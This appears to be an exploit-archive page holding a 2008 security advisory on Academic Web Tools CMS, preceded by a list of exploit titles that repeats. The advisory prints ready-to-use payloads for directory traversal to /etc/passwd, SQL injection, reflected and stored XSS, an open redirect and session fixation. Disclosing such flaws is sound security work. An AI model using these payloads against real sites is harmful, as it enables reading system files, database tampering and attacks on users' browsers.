
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
95 lines
4.2 KiB
Text
Executable file
95 lines
4.2 KiB
Text
Executable file
########################## www.BugReport.ir #######################################
|
|
#
|
|
# AmnPardaz Security Research Team
|
|
#
|
|
# Title: Academic Web Tools CMS Multiple Vulnerabilities
|
|
# Vendor: www.yektaweb.com
|
|
# Vulnerable Version: 1.4.2.8 and prior versions
|
|
# Exploit: Available
|
|
# Impact: Medium
|
|
# Fix: N/A
|
|
# Original Advisory: www.bugreport.ir/?/44
|
|
###################################################################################
|
|
|
|
####################
|
|
1. Description:
|
|
####################
|
|
ACADEMIC WEB TOOLS (AWT) yektaweb is a Persian content management system (CMS) which can manage university conferences and journals too.
|
|
####################
|
|
2. Vulnerabilities:
|
|
####################
|
|
2.1. Directory Traversal in "/download.php" in "dfile" parameter.
|
|
2.1.1. Exploit:
|
|
Check the exploit/POC section.
|
|
2.2. Injection Flaws. SQL Injection in "/rating.php" in "book_id" parameter.
|
|
2.2.1. Exploit:
|
|
Check the exploit/POC section.
|
|
2.3. Cross Site Scripting (XSS). Reflected XSS attack in "/login.php" in URL parameters.
|
|
2.3.1. Exploit:
|
|
Check the exploit/POC section.
|
|
2.4. Cross Site Scripting (XSS). Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters.
|
|
2.3.1. Exploit:
|
|
Check the exploit/POC section.
|
|
2.5. Cross Site Scripting (XSS). Reflected redirect XSS attack in "/rss_getfile.php" in "file" parameters.
|
|
2.4.1. Exploit:
|
|
Check the exploit/POC section.
|
|
2.6. Cross Site Scripting (XSS). Stored XSS attack in "/room.php" chat service.
|
|
2.5.1. Exploit:
|
|
Check the exploit/POC section.
|
|
2.7. Session Management Flaw. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation.
|
|
2.5.1. Exploit:
|
|
Check the exploit/POC section.
|
|
####################
|
|
3. Exploits/POCs:
|
|
####################
|
|
Original Exploit URL: http://bugreport.ir/index.php?/44/exploit
|
|
3.1. Directory Traversal in "/download.php" in "dfile" parameter.
|
|
-------------
|
|
http://[URL]/download.php?dfile=../../../../../../etc/passwd
|
|
http://[URL]/download.php?dfile=../../../../../../../etc/crontab
|
|
-------------
|
|
3.2. SQL Injection in "/rating.php" in "book_id" parameter.
|
|
-------------
|
|
<form action="http://[URL]/rating.php" method="post">
|
|
<input type=text name=book_id size=100 value="[SQL Injection]"><br>
|
|
<input type=hidden name=user_score size=100 value=5>
|
|
<input type=submit name=submit_for_rating value="Go!">
|
|
</form>
|
|
-------------
|
|
3.3. Reflected XSS attack in "/login.php" in URL parameters.
|
|
-------------
|
|
http://[URL]/login.php?Fake=<fake><script>alert(/sdl BugReport.IR xss/)</script>
|
|
-------------
|
|
3.4. Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters.
|
|
-------------
|
|
http://[URL]/hta/htmlarea.js.php?glb_sid=<script>alert(/sdl BugReport.IR xss/)</script>
|
|
-------------
|
|
3.5. Reflected redirect XSS attack in "rss_getfile.php" in "file" parameters.
|
|
-------------
|
|
http://[URL]/rss_getfile.php?file=http://BugReport.ir
|
|
-------------
|
|
3.6. Reflected XSS attack in "room.php".
|
|
-------------
|
|
First of all, login into the site.
|
|
Now submit this : <iframe src="http://www.BugReport.ir/" width=1000 height=1000></iframe>
|
|
at: http://[URL]/room.php?slc_lang=fa&sid=1&user_id=1
|
|
-------------
|
|
3.7. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation.
|
|
-------------
|
|
First, clear the site's cookies, and then goto:
|
|
http://[URL]/homepg/index.php?PHPSESSID=BugReportIRSessionFixation
|
|
http://[URL]/homepg/login.php?PHPSESSID=BugReportIRSessionFixation
|
|
-------------
|
|
####################
|
|
4. Solution:
|
|
####################
|
|
Source codes are encrypted. Wait for vendor patch.
|
|
####################
|
|
5. Credit:
|
|
####################
|
|
AmnPardaz Security Research & Penetration Testing Group
|
|
Contact: admin[4t}bugreport{d0t]ir
|
|
WwW.BugReport.ir
|
|
WwW.AmnPardaz.com
|
|
|
|
# milw0rm.com [2008-06-19]
|